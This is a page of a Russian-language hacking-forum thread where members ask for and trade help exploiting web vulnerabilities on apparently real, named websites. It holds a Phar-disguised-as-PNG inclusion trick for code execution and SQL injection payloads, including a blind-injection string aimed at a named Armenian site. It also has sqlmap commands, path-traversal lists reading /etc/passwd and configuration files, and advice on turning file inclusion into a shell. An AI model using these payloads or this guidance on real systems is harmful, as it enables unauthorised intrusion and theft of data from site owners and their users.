Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

Page 150 of 151
  1. dooble

    dooble Members of Antichat

    Joined:
    30 Dec 2016
    Messages:
    229
    Likes Received:
    596
    Reputations:
    145
    Был же пример https://forum.antichat.com/threads/337994/

    Создаем файл с начинкой /tmp/arc/include/pages.php
    и готовим архив
    Code:
    <?php
$p = new Phar('img.phar.png');
$p->setStub('<?php Phar::mapPhar();__HALT_COMPILER(); ?>');
$p->buildFromDirectory('/tmp/arc/','/.*/');
    проверяем
    Code:
    include("phar://img.phar.png/include/pages.php");
     
    #2981 dooble, 14 Sep 2022
    eminlayer7788 and WallHack like this.
  2. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    288
    Likes Received:
    89
    Reputations:
    1
    Подскажите, можно ли что нибудь сделать((
    а то sqlmap, то выдает: "'Microsoft SQL Server/Sybase AND time-based blind (heavy query)' injectable", потом пишет что пусто((

    может дело в 302 редиректе?
    пробовал
    и --ignore-redirects
    и как Y так и N в "got a 302 redirect to 'https://site.com:443/index.php'. Do you want to follow?

    Запрос:
    Code:
    POST /login.php HTTP/2
Host: site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

username=one'two&pswd=password
    Ответ:
    Code:
    HTTP/2 302 Found
Server: nginx
Date: Sat, 24 Sep 2022 09:27:34 GMT
Content-Type: text/html; charset=CP1251
Location: index.php
Set-Cookie: PHPSESSID=123abcdefghiklmnopqrstvxyz; path=/
Expires: Sat, 24 Sep 2022 09:27:33 GMT
Cache-Control: no-cache
Pragma: no-cache
Strict-Transport-Security: max-age=31536000; includeSubDomains

MSSQL: error, server: site.com, file: /login.php
        сервер:site.com
        URL:/login.php
        IP:xxx.xxx.xxx.xxx В подсети: xxx.xxx.xxx.xxx
        Файл:login.php
        Строка:43
        Ошибка Incorrect syntax near '\'.
        Запрос:
            SELECT
                id,
                fio,
                region,
                sector,
                email,
                user_common_id,
                fired_date
                
            FROM tbl_user WITH(NOLOCK)
            WHERE
                login = 'one\'\'two' AND
                pass = '5f4dcc3b5aa765d61d8327deb882cf998df86ee7b1338fc6b0522860f3f39b9c4e16aab5' AND
                ISNULL(del, 0) = 0
    Уже и тамперы пробовал перебирать((
     
    #2982 kacergei, 24 Sep 2022
  3. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    183
    Likes Received:
    56
    Reputations:
    2
     
    #2983 eminlayer7788, 24 Sep 2022
  4. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Как рашифровать тело запроса, где искать ключ и алгоритм?
    Code:
    POST /Api/proxy HTTP/1.1


{"request":"F2mN+PF0OAxs0IjJ7n1tkD8ut6/Zev8wu5is27r6qXj3uWtdCGZp2pCPlqUjD/w94+7d633OJNEVdM1eGADuUW5TO8SmDSEIuOM05HHhHnEjEnInECpumx8M8S0Et+x+1Z+eJcEd5is9DBgiZQ3SVXbfS8HICDuKiwgJuDGRRPE="}
     
    #2984 Octavian, 10 Oct 2022
  5. ilya1337

    ilya1337 New Member

    Joined:
    19 Mar 2019
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Как правильно составить запрос в sqlmap чтобы отправить сообщение через smtp в ms server и можно ли это в других субд?
    ПРИМЕР: https://habr.com/ru/post/179819/
    Пробовал создать профиль --sql-query=EXECUTE msdb.dbo.sysmail_add_account_sp Но получаю 'NULL'
    Вообщем как составить запросы грамотно
     
    #2985 ilya1337, 24 Dec 2022
  6. Samozvanec

    Samozvanec Member

    Joined:
    19 Jul 2020
    Messages:
    10
    Likes Received:
    8
    Reputations:
    1
    Доброго времени суток! Подскажите, пожалуйста, в какую сторону копать? Не поддается. Думал, что blind, сперва, но по ходу нет

    Code:
    https://www.lans.am/am/catalog/3106.htm'+order+by+1--+-
     
    #2986 Samozvanec, 9 Jan 2023
  7. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,177
    Likes Received:
    1,156
    Reputations:
    202
    обойди фильтр на запятые
     
    #2987 b3, 18 Jan 2023
    CyberTro1n likes this.
  8. Genius Black

    Genius Black New Member

    Joined:
    29 Jul 2015
    Messages:
    34
    Likes Received:
    4
    Reputations:
    0
    LFI , не могу найти пароли от ДБ.
    /../../../../../../../../../../home/website/website/releases/20221115194516/modules/main/cart.html
    /../../../../../../../../../../home/website/website/releases/20221115194516/modules/load-module.html
    /../../../../../../../../../../proc/meminfo
    /../../../../../../../../../../proc/cpuinfo
    /../../../../../../../../../../etc/apache2/sites-available/default
    /../../../../../../../../../../etc/apache2/sites-enabled/000-default
    /../../../../../../../../../../etc/passwd
    /../../../../../../../../../../etc/mysql/my.cnf
    /../../../../../../../../../../etc/apache2/apache2.conf
    /../../../../../../../../../../etc/apache2/envvars
    /../../../../../../../../../../etc/init.d/apache2
    /../../../../../../../../../../etc/default/locale

    Напишите в личку если кто-то может помочь раскрутить, потому что залиться никак не получается.
     
    #2988 Genius Black, 19 Jan 2023
  9. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,177
    Likes Received:
    1,156
    Reputations:
    202
    есть удаленный доступ к mysql?
    /proc/self/environ
    инклуд загруженой картинки, если есть возможность загрузить свой аватар например
    инклуд позволяет обращаться к враперам?
    домашняя директория сайта известна?

    Чем больше инфы тем больше вероятность.
     
    #2989 b3, 20 Jan 2023
    CyberTro1n likes this.
  10. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    183
    Likes Received:
    56
    Reputations:
    2
    Hi
    can upload shell or RCE in this traversal ?


    Thanks !
     
    #2990 eminlayer7788, 24 Jan 2023
    Last edited: 25 Jan 2023
  11. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    /proc/self/environ + Smarty ;)
     
    #2991 crlf, 24 Jan 2023
    CyberTro1n likes this.
  12. Samozvanec

    Samozvanec Member

    Joined:
    19 Jul 2020
    Messages:
    10
    Likes Received:
    8
    Reputations:
    1
    не поддается :(
     
    #2992 Samozvanec, 26 Jan 2023
  13. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    244
    Likes Received:
    450
    Reputations:
    145
    Code:
    '+Or+ascii(SUBSTR((select+user())+FROM+2+FOR+1))>96+--+-
     
    #2993 joelblack, 26 Jan 2023
    dooble, crlf and CyberTro1n like this.
  14. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Всем привет
    Получится воспроизвести RCE в коде

    Code:
    $host = $_GET['host'];
$text = $_GET['text'];

function gif($mes, $vid = true) {
  $mes = str_ireplace("<br><br>", "<br>", $mes);
  if($vid){
    $mes = preg_replace("':(gif-){1}([0-9]{1,2}):'i", "<img src=\"gif/\\1\\2.gif\">", $mes); 
  }
  $mes = mb_ereg_replace('\n', '<br />', $mes);
  $mes = preg_replace('#https?://(www\.)?(?!'.$host.')[^ ]++#iU', '<h2>Ссылка вырезана</h2>', $mes);
  return $mes;
}


echo gif($text,false);
    Как тут
    https://ik0nw.github.io/2020/09/23/PHP::Preg_replace()-RCE/#CTF-challenge
     
    #2994 WallHack, 2 Feb 2023
  15. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,177
    Likes Received:
    1,156
    Reputations:
    202
    в CTF примере модификатор "е"
    Code:
     '/(' . $regex . ')/ei',
    исполняет код, у тебя такого нет в твоем коде.
     
    #2995 b3, 3 Feb 2023
    WallHack and crlf like this.
  16. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Когда-то нулевым байтом можно было отсечь часть правила и дописать нужные модификаторы, а может это просто байки старых пердунов олдскульщиков :D Модификатор e с версии PHP7 не используется и выкидывает ошибку. Да и в любом случае, нужно контроллить второй параметр preg_replace, чего не наблюдается в коде выше. XSS это максимум.
     
    #2996 crlf, 3 Feb 2023
    KIR@PRO, BigBear, b3 and 1 other person like this.
  17. swerk1337

    swerk1337 New Member

    Joined:
    28 Jun 2022
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста, как можно составить запрос для sqlmap ?

    [​IMG]
     

    Attached Files:

    • 1.JPG
      1.JPG
      File size:
      35.9 KB
      Views:
      86
    #2997 swerk1337, 20 Mar 2023
  18. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    487
    Likes Received:
    459
    Reputations:
    8
    sqlmap -r file.txt --dbs --risk=3 --level=3, где file.txt это скопируй запрос с акунетикса
     
    #2998 karkajoi, 20 Mar 2023
    MrProgrammer and swerk1337 like this.
  19. swerk1337

    swerk1337 New Member

    Joined:
    28 Jun 2022
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    Спасибо, только акунетикс экспортирует в формате json,xml,csv, или я не там смотрю ?
    UPD: Вроде разобрался, скопировал http request с акунетикса в текстовый файл, скульмап вроде скушал
     
    #2999 swerk1337, 21 Mar 2023
    Last edited: 21 Mar 2023
  20. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Помогите раскрутить
    Code:
    https://www.kfz-bayern.de/presse/mediathek/fotos.html?tx_dscmediacenter_main%5Bcat%5D=2&tx_dscmediacenter_main%5Baction%5D=list&tx_dscmediacenter_main%5Bcontroller%5D=Mediacenter&cHash=81a87cafe17fa24dc1e9c0cb98ad20e0&tx_dscmediacenter_main%5Bamount%5D=5
    Проблема в том что ошибка в конце запроса LIMIT 0, 5
     
    #3000 DezMond™, 14 Apr 2023
(You must log in or sign up to post here.)
Page 150 of 151
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.